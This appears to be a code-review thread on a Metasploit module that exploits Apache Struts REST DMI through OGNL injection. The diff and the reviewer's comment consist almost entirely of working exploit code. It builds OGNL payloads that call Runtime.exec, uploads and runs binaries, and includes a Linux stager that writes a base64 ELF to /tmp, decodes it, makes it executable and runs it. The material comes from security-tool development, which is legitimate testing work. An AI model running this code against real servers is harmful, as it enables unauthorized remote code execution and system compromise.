modules/exploits/multi/http/struts_dmi_rest_exec.rb

```diff
@@ -0,0 +1,204 @@
+    end
+    resp
+  end
+
+  def generate_rce_payload(code)
+    payload = ""
+    payload << Rex::Text.uri_encode("#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS")
+    payload << ","
+    payload << Rex::Text.uri_encode(code)
+    payload << ","
+    payload << Rex::Text.uri_encode("#xx.toString.json")
+    payload << "?"
+    payload << Rex::Text.uri_encode("#xx:#request.toString")
+    payload
+  end
+
+  def upload_exec(cmd, filename, content)
+    var_a = rand_text_alpha_lower(4)
+    var_b = rand_text_alpha_lower(4)
+    var_c = rand_text_alpha_lower(4)
+    var_d = rand_text_alpha_lower(4)
+    var_e = rand_text_alpha_lower(4)
+    var_f = rand_text_alpha_lower(4)
+
+    code =  "##{var_a}=new sun.misc.BASE64Decoder(),"
+    code << "##{var_b}=new java.io.FileOutputStream(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_e}[0]))),"
+    code << "##{var_b}.write(new java.math.BigInteger(#parameters.#{var_f}[0], 16).toByteArray()),##{var_b}.close(),"
+    code << "##{var_c}=new java.io.File(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_e}[0]))),##{var_c}.setExecutable(true),"
+    code << "@java.lang.Runtime@getRuntime().exec(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_d}[0])))"
+    payload = generate_rce_payload(code)
+
+    params_hash = {
+      var_d => Rex::Text.encode_base64(cmd),
+      var_e => Rex::Text.encode_base64(filename),
+      var_f => content
+    }
+    send_http_request(payload, params_hash)
+  end
+
+  def check
+    var_a = rand_text_alpha_lower(4)
+    var_b = rand_text_alpha_lower(4)
+
+    addend_one = rand_text_numeric(rand(3) + 1).to_i
+    addend_two = rand_text_numeric(rand(3) + 1).to_i
+    sum = addend_one + addend_two
+    flag = Rex::Text.rand_text_alpha(5)
+
+    code = "##{var_a}=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),"
+    code << "##{var_a}.print(#parameters.#{var_b}[0]),"
+    code << "##{var_a}.print(new java.lang.Integer(#{addend_one}+#{addend_two})),"
+    code << "##{var_a}.print(#parameters.#{var_b}[0]),"
+    code << "##{var_a}.close()"
+
+    payload = generate_rce_payload(code)
+    params_hash = { var_b => flag }
+
+    begin
+      resp = send_http_request(payload, params_hash)
+    rescue Msf::Exploit::Failed
+      return Exploit::CheckCode::Unknown
+    end
+
+    if resp && resp.code == 200 && resp.body.include?("#{flag}#{sum}#{flag}")
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    payload_exe = rand_text_alphanumeric(4 + rand(4))
+    case target['Platform']
+      when 'java'
+        payload_exe = "#{temp_path}#{payload_exe}.jar"
+        pl_exe = payload.encoded_jar.pack
+        command = "java -jar #{payload_exe}"
+      when 'linux'
+        path = datastore['TMPPATH'] || '/tmp/'
+        pl_exe = generate_payload_exe
+        payload_exe = "#{path}#{payload_exe}"
+        command = "/bin/sh -c #{payload_exe}"
```

Comment:
@wvu-r7  `execute_command` has some limits, ex: `echo AAA | tee /tmp/test`. Any good idea for it ? 

```
  def execute_command(cmd, opts={})
    var_a = rand_text_alpha_lower(4)
    var_b = rand_text_alpha_lower(4)
    code =  "##{var_a}=new sun.misc.BASE64Decoder(),"
    code << "@java.lang.Runtime@getRuntime().exec(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_b}[0])))"
    payload = generate_rce_payload(code)

    params_hash = {
      var_b => Rex::Text.encode_base64(cmd)
    }
    send_http_request(payload, params_hash)
  end
```

```
  def linux_stager
    cmds = "echo LINE | tee FILE"
    exe  = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
    base64 = Rex::Text.encode_base64(exe)
    base64.gsub!(/\=/, "\\u003d")
    file = rand_text_alphanumeric(6+rand(4))

    execute_command("touch /tmp/#{file}.b64")
    cmds.gsub!(/FILE/, "/tmp/" + file + ".b64")

    base64.each_line do |line|
      line.chomp!
      cmd = cmds
      cmd.gsub!(/LINE/, line)
      execute_command(cmds)
    end

    execute_command("base64 -d /tmp/#{file}.b64|tee /tmp/#{file}")
    execute_command("chmod +x /tmp/#{file}")
    execute_command("rm /tmp/#{file}.b64")

    execute_command("/tmp/#{file}")
    @to_delete = "/tmp/#{file}"
  end
```